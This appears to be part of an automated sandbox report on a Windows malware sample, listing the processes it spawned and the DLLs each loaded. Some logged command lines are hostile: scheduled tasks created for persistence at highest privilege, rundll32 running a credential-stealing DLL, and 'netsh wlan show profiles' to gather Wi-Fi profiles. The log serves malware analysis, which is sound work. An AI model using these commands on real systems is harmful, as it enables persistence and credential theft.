                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1940,i,13936497851858077106,7979509008271672704,262144 /prefetch:8Jump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHESTJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHESTJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2008,i,1160871462993257416,2185165771260797926,262144 /prefetch:8
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 7556 -ip 7556
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7556 -s 2036
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6188 -ip 6188
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2584 -ip 2584
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 2040
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 79380
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 12156 -ip 12156
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 12156 -s 844
                                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1960,i,5587240117108389418,17388237419523249848,262144 /prefetch:8
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe "C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe"
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                                Source: C:\Windows\System32\rundll32.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: rstrtmgr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: d3d11.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: dxgi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: resourcepolicyclient.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: d3d10warp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: dxcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: webio.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: vaultcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
